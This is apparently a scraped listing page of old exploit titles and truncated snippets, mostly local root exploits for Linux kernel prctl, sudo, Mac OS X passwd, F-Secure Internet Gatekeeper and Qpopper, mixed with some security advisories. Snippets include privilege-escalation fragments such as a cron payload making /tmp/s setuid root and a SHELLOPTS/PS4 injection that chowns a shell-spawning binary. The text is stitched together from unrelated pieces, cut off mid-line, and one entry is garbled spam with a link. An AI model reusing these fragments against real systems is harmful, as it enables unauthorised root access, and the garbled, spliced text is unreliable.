prctl.sh.txt

!/bin/sh PRCTL local root exp By: Sunix + effected systems 2.6.13 /tmp/getsuid.c include include include include include include include char payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f...

Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)

Exploit for linux platform in category local exploits ================================================================== Linux Kernel 2.6.13 /tmp/getsuid.c include include include include include include include char...

Linux Kernel 2.6.13 &lt;= 2.6.17.4 sys_prctl() Local Root Exploit (3)

No description provided by source. / $Id: raptorprctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ raptorprctl.c - Linux 2.6.x suiddumpable vulnerability Copyright c 2006 Marco Ivaldi [email protected] The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16...

Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)

Exploit for linux platform in category local exploits ================================================================== Linux Kernel 2.6.13 = 2.6.13 prctl kernel exploit C Julien TINNES If you read the Changelog from 2.6.13 you've probably seen: PATCH setuid core dump This patch mainly adds...

FreeBSD : kpopup -- local root exploit and local denial of service (1613db79-8e52-11da-8426-000fea0a9611)

Mitre CVE reports : Format string vulnerability in main.cpp in kpopup 0.9.1-0.9.5pre2 allows local users to cause a denial of service segmentation fault and possibly execute arbitrary code via format string specifiers in command line arguments. misc.cpp in KPopup 0.9.1 trusts the PATH variable wh...

FreeBSD : openvpn -- LD_PRELOAD code execution on client through malicious or compromised server (be4ccb7b-c48b-11da-ae12-0002b3b60e4c)

Hendrik Weimer reports : OpenVPN clients are a bit too generous when accepting configuration options from a server. It is possible to transmit environment variables to client-side shell scripts. There are some filters in place to prevent obvious nonsense, however they don't catch the good old...

[SECURITY] [DSA 1040-1] New gdm packages fix local root exploit

-------------------------------------------------------------------------- Debian Security Advisory DSA 1040-1 [email protected] http://www.debian.org/security/ Martin Schulze April 24th, 2006 http://www.debian.org/security/faq -...

irix6local.txt

SGI IRIX 6.usr/sysadm/bin/runpriv draft resolution to be to complete at antecedence but to stoke seriously came ran ready-to-wear there is no need to explain in the interest of owners yonder protection them from geeks but whom need to make realize excellent. visit http://lezr.com/vb echo SGI IRIX...

Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit

Exploit for macOS platform in category local exploits ================================================================= Apple Mac OS X /usr/bin/passwd Custom Passwd Local Root Exploit ================================================================= !/usr/bin/perl /usr/bin/passwdOSX: local root...

Apple Mac OSX - usrbinpasswd Custom Passwd Privilege Escalation

Apple Mac OSX - usrbinpasswd Custom Passwd Privilege Escalation !/usr/bin/perl /usr/bin/passwdOSX: local root exploit. by: vade79/v9 [email protected] fakehalo/realhalo Apple OSX's /usr/bin/passwd program has support for a custom passwd file to be used instead of the standard/static path. this featu...

Sudo 1.6.x - Environment Variable Handling Security Bypass (1)

source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A local attacker with the ability to run Python scripts can...

Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow

mercurysexywarez Okayokay THiS iS 0DAY!!! Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT PH SERVER since me and my folks didn't find enough wild targets, i release this pretty warez to the public :PP kcope kingcopeatgmx.net in 2005! JUUAREZ! Big thanx to...

fsigk_exp.py.txt

!/usr/bin/env python fsigkexp.py: F-Secure Internet Gatekeeper for Linux local root exploit acknowledgements: everyone in pure-elite and uDc. coded by: [email protected] http://xavsec.blogspot.com Make proper checks and import nessesary calls from modules. try: from sys import argv except...

Sudo &lt;= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

No description provided by source. Sudo local root escalation privilege vuln versions : sudo 1.6.8p10 by breno You need sudo access execution for some bash script Use csh shell to change SHELLOPTS env ie: %cat x.sh !/bin/bash -x echo "Getting root!!" % cat /etc/sudoers ... breno ALL=ALL...

Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation

Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls -lisa egg 1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 eg...

Operator Shell (osh) 1.7-14 Local Root Exploit

No description provided by source. !/bin/sh OSH 1.7-14 Exploit EDUCATIONAL purposes only.... :- by Charles Stevenson core [email protected] Description: The Operator Shell Osh is a setuid root, security enhanced, restricted shell. It allows the administrator to carefully limit the access of special...

[EXPL] F-Secure Internet Gatekeeper Local Root &#40;Exploit&#41;

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit

Exploit for linux platform in category local exploits ==================================================================== F-Secure Internet Gatekeeper for linux 2.15.484 Local Root Exploit ==================================================================== !/usr/bin/env python F-Secure Anti-Vir...

Linux Kernel 2.4.x2.6.x - Bluez BlueTooth Signed Buffer Index Privilege Escalation (2)

Linux Kernel 2.4.x2.6.x - Bluez BlueTooth Signed Buffer Index Privilege Escalation 2 / Due to many responses i've improved the exploit to cover more systems! ONGBAK v0.9 october 24th 05 """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use all possible memory regions o...

Qpopper &lt;= 4.0.8 (poppassd) Local Root Exploit (linux)

No description provided by source. !/bin/sh tested and working /str0ke Linux Qpopper poppassd latest version local r00t exploit by kcope August 2005 Confidential - Keep Private! POPPASSDPATH=/usr/local/bin/poppassd echo "" echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"...